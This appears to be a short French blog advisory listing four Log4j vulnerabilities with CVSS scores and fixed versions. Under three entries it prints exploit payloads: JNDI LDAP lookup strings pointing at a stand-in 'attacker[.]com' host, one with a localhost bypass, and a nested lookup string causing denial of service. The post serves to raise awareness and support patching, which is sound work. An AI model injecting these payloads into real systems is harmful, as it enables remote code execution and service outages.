Vulnérabilités Log4j : la saga continue ...

· 1 minute de lecture
Vulnérabilités Log4j : la saga continue ...

La liste  des vulnérabilités découvertes à ce jour dans la  librairie java Log4j :

  • CVE-2021-44228 (CVSS score: 10.0) - A remote code execution vulnerability (RCE) affecting #Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
Payload: ${jndi:ldap://attacker[.]com:1389/a}
  • CVE-2021-45046 (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)
Payload: ${jndi:ldap://127.0.0.1#attacker[.]com:1389/a}
  • CVE-2021-45105 (CVSS score: 7.5) - A denial-of-service (#DoS) vulnerability affecting #Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)
Payload: ${${::-${::-$${::-j}}}}
  • CVE-2021-4104 (CVSS score: 8.1) - An untrusted deserialization flaw affecting #Log4j version 1.2 (No fix available; Upgrade to version 2.17.0)

Êtes-vous vulnérables ?